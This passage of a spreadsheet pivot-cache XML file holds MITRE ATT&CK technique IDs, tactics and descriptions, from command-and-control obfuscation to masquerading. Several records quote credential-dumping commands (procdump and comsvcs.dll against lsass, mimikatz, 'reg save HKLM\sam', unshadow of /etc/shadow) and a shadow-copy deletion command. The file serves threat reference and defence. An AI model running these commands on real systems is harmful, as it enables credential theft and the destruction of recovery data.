            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18A0E870-7939-48F4-728B-7A240D8429F9}"/>
            </a:ext>
            <a:ext uri="{147F2762-F138-4A5C-976F-8EAC2B608ADB}">
              <a16:predDERef xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" pred="{EE1B1741-FF03-145B-071B-FA9DA809C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 c" refreshedDate="45918.021774537039" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="656" xr:uid="{94CB8375-D5E2-4906-8F4E-6434151024B8}">
  <cacheSource type="worksheet">
    <worksheetSource name="Techniques"/>
  </cacheSource>
  <cacheFields count="3">
    <cacheField name="Tech#" numFmtId="0">
      <sharedItems count="203">
        <s v="T1001"/>
        <s v="T1003"/>
        <s v="T1005"/>
        <s v="T1006"/>
        <s v="T1007"/>
        <s v="T1008"/>
        <s v="T1010"/>
        <s v="T1011"/>
        <s v="T1012"/>
        <s v="T1014"/>
        <s v="T1016"/>
        <s v="T1018"/>
        <s v="T1020"/>
        <s v="T1021"/>
        <s v="T1025"/>
        <s v="T1027"/>
        <s v="T1029"/>
        <s v="T1030"/>
        <s v="T1033"/>
        <s v="T1036"/>
        <s v="T1037"/>
        <s v="T1039"/>
        <s v="T1040"/>
        <s v="T1041"/>
        <s v="T1046"/>
        <s v="T1047"/>
        <s v="T1048"/>
        <s v="T1049"/>
        <s v="T1052"/>
        <s v="T1053"/>
        <s v="T1055"/>
        <s v="T1056"/>
        <s v="T1057"/>
        <s v="T1059"/>
        <s v="T1068"/>
        <s v="T1069"/>
        <s v="T1070"/>
        <s v="T1071"/>
        <s v="T1072"/>
        <s v="T1074"/>
        <s v="T1078"/>
        <s v="T1080"/>
        <s v="T1082"/>
        <s v="T1083"/>
        <s v="T1087"/>
        <s v="T1090"/>
        <s v="T1091"/>
        <s v="T1092"/>
        <s v="T1095"/>
        <s v="T1098"/>
        <s v="T1102"/>
        <s v="T1104"/>
        <s v="T1105"/>
        <s v="T1106"/>
        <s v="T1110"/>
        <s v="T1111"/>
        <s v="T1112"/>
        <s v="T1113"/>
        <s v="T1114"/>
        <s v="T1115"/>
        <s v="T1119"/>
        <s v="T1120"/>
        <s v="T1123"/>
        <s v="T1124"/>
        <s v="T1125"/>
        <s v="T1127"/>
        <s v="T1129"/>
        <s v="T1132"/>
        <s v="T1133"/>
        <s v="T1134"/>
        <s v="T1135"/>
        <s v="T1136"/>
        <s v="T1137"/>
        <s v="T1140"/>
        <s v="T1176"/>
        <s v="T1185"/>
        <s v="T1187"/>
        <s v="T1189"/>
        <s v="T1190"/>
        <s v="T1195"/>
        <s v="T1197"/>
        <s v="T1199"/>
        <s v="T1200"/>
        <s v="T1201"/>
        <s v="T1202"/>
        <s v="T1203"/>
        <s v="T1204"/>
        <s v="T1205"/>
        <s v="T1207"/>
        <s v="T1210"/>
        <s v="T1211"/>
        <s v="T1212"/>
        <s v="T1213"/>
        <s v="T1216"/>
        <s v="T1217"/>
        <s v="T1218"/>
        <s v="T1219"/>
        <s v="T1220"/>
        <s v="T1221"/>
        <s v="T1222"/>
        <s v="T1480"/>
        <s v="T1482"/>
        <s v="T1484"/>
        <s v="T1485"/>
        <s v="T1486"/>
        <s v="T1489"/>
        <s v="T1490"/>
        <s v="T1491"/>
        <s v="T1495"/>
        <s v="T1496"/>
        <s v="T1497"/>
        <s v="T1498"/>
        <s v="T1499"/>
        <s v="T1505"/>
        <s v="T1518"/>
        <s v="T1525"/>
        <s v="T1526"/>
        <s v="T1528"/>
        <s v="T1529"/>
        <s v="T1530"/>
        <s v="T1531"/>
        <s v="T1534"/>
        <s v="T1535"/>
        <s v="T1537"/>
        <s v="T1538"/>
        <s v="T1539"/>
        <s v="T1542"/>
        <s v="T1543"/>
        <s v="T1546"/>
        <s v="T1547"/>
        <s v="T1548"/>
        <s v="T1550"/>
        <s v="T1552"/>
        <s v="T1553"/>
        <s v="T1554"/>
        <s v="T1555"/>
        <s v="T1556"/>
        <s v="T1557"/>
        <s v="T1558"/>
        <s v="T1559"/>
        <s v="T1560"/>
        <s v="T1561"/>
        <s v="T1562"/>
        <s v="T1563"/>
        <s v="T1564"/>
        <s v="T1565"/>
        <s v="T1566"/>
        <s v="T1567"/>
        <s v="T1568"/>
        <s v="T1569"/>
        <s v="T1570"/>
        <s v="T1571"/>
        <s v="T1572"/>
        <s v="T1573"/>
        <s v="T1574"/>
        <s v="T1578"/>
        <s v="T1580"/>
        <s v="T1583"/>
        <s v="T1584"/>
        <s v="T1585"/>
        <s v="T1586"/>
        <s v="T1587"/>
        <s v="T1588"/>
        <s v="T1589"/>
        <s v="T1590"/>
        <s v="T1591"/>
        <s v="T1592"/>
        <s v="T1593"/>
        <s v="T1594"/>
        <s v="T1595"/>
        <s v="T1596"/>
        <s v="T1597"/>
        <s v="T1598"/>
        <s v="T1599"/>
        <s v="T1600"/>
        <s v="T1601"/>
        <s v="T1602"/>
        <s v="T1606"/>
        <s v="T1608"/>
        <s v="T1609"/>
        <s v="T1610"/>
        <s v="T1611"/>
        <s v="T1612"/>
        <s v="T1613"/>
        <s v="T1614"/>
        <s v="T1615"/>
        <s v="T1619"/>
        <s v="T1620"/>
        <s v="T1621"/>
        <s v="T1622"/>
        <s v="T1647"/>
        <s v="T1648"/>
        <s v="T1649"/>
        <s v="T1650"/>
        <s v="T1651"/>
        <s v="T1652"/>
        <s v="T1653"/>
        <s v="T1654"/>
        <s v="T1656"/>
        <s v="T1657"/>
        <s v="T1659"/>
        <s v="T1665"/>
        <s v="T1666"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Tactics" numFmtId="0">
      <sharedItems count="31">
        <s v="Command and Control"/>
        <s v="Credential Access"/>
        <s v="Collection"/>
        <s v="Defense Evasion"/>
        <s v="Discovery"/>
        <s v="Exfiltration"/>
        <s v="Lateral Movement"/>
        <s v="Persistence, Privilege Escalation"/>
        <s v="Credential Access, Discovery"/>
        <s v="Execution"/>
        <s v="Execution, Persistence, Privilege Escalation"/>
        <s v="Defense Evasion, Privilege Escalation"/>
        <s v="Collection, Credential Access"/>
        <s v="Privilege Escalation"/>
        <s v="Execution, Lateral Movement"/>
        <s v="Defense Evasion, Initial Access, Persistence, Privilege Escalation"/>
        <s v="Initial Access, Lateral Movement"/>
        <s v="Initial Access, Persistence"/>
        <s v="Persistence"/>
        <s v="Initial Access"/>
        <s v="Defense Evasion, Persistence"/>
        <s v="Command and Control, Defense Evasion, Persistence"/>
        <s v="Impact"/>
        <s v="Defense Evasion, Discovery"/>
        <s v="Defense Evasion, Lateral Movement"/>
        <s v="Credential Access, Defense Evasion, Persistence"/>
        <s v="Defense Evasion, Persistence, Privilege Escalation"/>
        <s v="Resource Development"/>
        <s v="Reconnaissance"/>
        <s v="Defense Evasion, Execution"/>
        <s v="Command and Control, Initial Access"/>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6">
  <r>
    <x v="0"/>
    <x v="0"/>
    <s v="Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020)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
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <s v="Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020)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
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <s v="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
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. _x000a__x000a_Adversaries may also leverage legitimate protocols to impersonate expected web traffic or trusted services. For example, adversaries may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted data to disguise C2 communications or mimic legitimate services such as Gmail, Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation: Malleable-C2-U42)"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information._x000a__x000a_Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well._x000a_"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="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_x000a__x000a_As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system._x000a__x000a_For example, on the target host use procdump:_x000a__x000a_* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;_x000a__x000a_Locally, mimikatz can be run using:_x000a__x000a_* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;_x000a_* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;_x000a__x000a_Built-in Windows tools such as `comsvcs.dll` can also be used:_x000a__x000a_* &lt;code&gt;rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full&lt;/code&gt;(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)_x000a__x000a_Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)_x000a__x000a_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_x000a__x000a_The following SSPs can be used to access credentials:_x000a__x000a_* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package._x000a_* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)_x000a_* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later._x000a_* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)_x000a_"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="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_x000a__x000a_A number of tools can be used to retrieve the SAM file through in-memory techniques:_x000a__x000a_* pwdumpx.exe_x000a_* [gsecdump](https://attack.mitre.org/software/S0008)_x000a_* [Mimikatz](https://attack.mitre.org/software/S0002)_x000a_* secretsdump.py_x000a__x000a_Alternatively, the SAM can be extracted from the Registry with Reg:_x000a__x000a_* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;_x000a_* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;_x000a__x000a_Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)_x000a__x000a_Notes: _x000a__x000a_* RID 500 account is the local, built-in administrator._x000a_* RID 501 is the guest account._x000a_* User accounts start with a RID of 1,000+._x000a_"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="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_x000a__x000a_In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)_x000a__x000a_The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes._x000a__x000a_* Volume Shadow Copy_x000a_* secretsdump.py_x000a_* Using the in-built Windows tool, ntdsutil.exe_x000a_* Invoke-NinjaCopy_x000a_"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="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_x000a__x000a_[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)_x000a__x000a_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_x000a__x000a_On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) _x000a__x000a_With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)_x000a__x000a_Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_DCSync functionality has been included in the &quot;lsadump&quot; module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="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_x000a__x000a_When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as &lt;code&gt;grep -E &quot;^[0-9a-f-]* r&quot; /proc/&quot;$pid&quot;/maps | cut -d' ' -f 1&lt;/code&gt;, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)_x000a__x000a_If running as or with the permissions of a web browser, a process can search the `/maps` &amp; `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located."/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="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_x000a__x000a_The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;_x000a_"/>
  </r>
  <r>
    <x v="2"/>
    <x v="2"/>
    <s v="Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration._x000a__x000a_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_x000a_"/>
  </r>
  <r>
    <x v="3"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="4"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions."/>
  </r>
  <r>
    <x v="5"/>
    <x v="0"/>
    <s v="Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds."/>
  </r>
  <r>
    <x v="6"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="7"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network."/>
  </r>
  <r>
    <x v="7"/>
    <x v="5"/>
    <s v="Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel._x000a__x000a_Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network."/>
  </r>
  <r>
    <x v="8"/>
    <x v="4"/>
    <s v="Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software._x000a__x000a_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r>
  <r>
    <x v="9"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="10"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. "/>
  </r>
  <r>
    <x v="10"/>
    <x v="4"/>
    <s v="Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites._x000a__x000a_Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers."/>
  </r>
  <r>
    <x v="10"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a_"/>
  </r>
  <r>
    <x v="11"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a_"/>
  </r>
  <r>
    <x v="12"/>
    <x v="5"/>
    <s v="Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) _x000a__x000a_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
  </r>
  <r>
    <x v="12"/>
    <x v="5"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary."/>
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user._x000a__x000a_SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba._x000a__x000a_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
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user._x000a__x000a_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_x000a__x000a_Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)_x000a__x000a_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
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user._x000a__x000a_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
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user._x000a__x000a_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
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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_x000a__x000a_In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password. "/>
  </r>
  <r>
    <x v="13"/>
    <x v="6"/>
    <s v="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_x000a__x000a_Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. _x000a__x000a_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
  </r>
  <r>
    <x v="14"/>
    <x v="2"/>
    <s v="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_x000a__x000a_Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media."/>
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files._x000a__x000a_[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) _x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)_x000a__x000a_Tools such as &lt;code&gt;Invoke-Obfuscation&lt;/code&gt; and &lt;code&gt;Invoke-DOSfucation&lt;/code&gt; have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)"/>
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="Adversaries may store data in &quot;fileless&quot; formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock` may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)_x000a__x000a_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Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. _x000a_"/>
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use._x000a__x000a_This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64._x000a__x000a_The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection._x000a__x000a_For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) _x000a__x000a_Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution."/>
  </r>
  <r>
    <x v="15"/>
    <x v="3"/>
    <s v="Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone) _x000a_Other obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation: polymorphic-medium)_x000a_"/>
  </r>
  <r>
    <x v="16"/>
    <x v="5"/>
    <s v="Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability._x000a__x000a_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
  </r>
  <r>
    <x v="17"/>
    <x v="5"/>
    <s v="An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts."/>
  </r>
  <r>
    <x v="18"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)"/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)"/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature."/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="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
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)"/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Adversaries may also use the same icon of the file they are trying to mimic."/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system._x000a__x000a_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_x000a__x000a_Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious."/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type."/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)"/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child&quot;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_x000a__x000a_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_x000a__x000a_Another example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) "/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)_x000a__x000a_Often, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  _x000a__x000a_Note that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.  "/>
  </r>
  <r>
    <x v="20"/>
    <x v="7"/>
